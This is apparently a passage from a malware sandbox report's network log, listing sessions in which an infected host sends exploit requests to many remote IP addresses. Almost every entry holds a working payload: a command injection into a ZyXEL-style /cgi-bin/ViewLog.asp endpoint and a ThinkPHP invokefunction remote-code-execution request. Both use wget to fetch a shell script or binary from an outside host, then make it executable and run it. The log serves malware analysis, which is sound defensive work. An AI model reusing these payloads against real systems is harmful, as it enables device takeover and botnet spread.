Nov 22, 2023 08:38:46.332254887 CET	6875	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:46.923959970 CET	6924	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:48.075824022 CET	7048	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:50.379471064 CET	7353	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:54.986939907 CET	7934	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:04.201528072 CET	9051	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:23.910820961 CET	11439	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:00.769535065 CET	15816	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
334	192.168.2.23	44632	95.235.223.125	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.355855942 CET	6876	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:46.602080107 CET	6918	IN	HTTP/1.1 403 Forbidden

Session ID	Source IP	Source Port	Destination IP	Destination Port
335	192.168.2.23	53824	94.120.27.163	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.356610060 CET	6876	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
336	192.168.2.23	51924	94.121.106.125	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.356806040 CET	6877	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
337	192.168.2.23	46102	94.23.215.172	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.744605064 CET	6921	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:46.918668985 CET	6924	IN	HTTP/1.0 400 Bad Request Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a Data Ascii: Client sent an HTTP request to an HTTPS server.

Session ID	Source IP	Source Port	Destination IP	Destination Port
338	192.168.2.23	48094	62.29.81.191	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.794047117 CET	6922	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
339	192.168.2.23	48938	62.29.88.203	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.797883987 CET	6922	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
340	192.168.2.23	51402	62.197.233.121	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:46.939403057 CET	6925	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
341	192.168.2.23	34000	85.160.76.165	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:47.161586046 CET	6929	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:47.419492006 CET	6991	IN	HTTP/1.0 401 Unauthorized Server: HTTPD Date: Thu, 01 Jan 1970 00:20:05 GMT WWW-Authenticate: Basic realm="USER LOGIN" Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 34 3e 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>Authorization required.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
342	192.168.2.23	57138	62.210.208.231	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:47.514163971 CET	7016	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
343	192.168.2.23	58040	31.136.240.143	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:47.872178078 CET	7043	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:48.427752018 CET	7088	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:49.547631025 CET	7283	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:51.915303946 CET	7490	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:56.522578001 CET	8160	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:05.481369972 CET	9217	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:23.910798073 CET	11439	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:00.769550085 CET	15817	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
344	192.168.2.23	57086	94.110.185.58	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:47.883320093 CET	7044	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
345	192.168.2.23	32774	31.135.152.72	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:47.903359890 CET	7045	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:48.144828081 CET	7049	IN	HTTP/1.1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
346	192.168.2.23	37634	94.121.191.124	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:47.911454916 CET	7045	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
347	192.168.2.23	56140	112.30.213.56	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:47.952244997 CET	7047	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
348	192.168.2.23	59038	112.171.240.247	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:48.247354984 CET	7060	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:48.538305998 CET	7089	IN	HTTP/1.1 400 Transfer-Encoding: chunked Date: Wed, 22 Nov 2023 07:38:48 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
349	192.168.2.23	53834	112.125.169.25	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:48.255983114 CET	7061	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:48.561667919 CET	7091	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:35:33 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
350	192.168.2.23	40100	112.125.210.220	80

Timestamp	kBytes transferred	Direction	Data
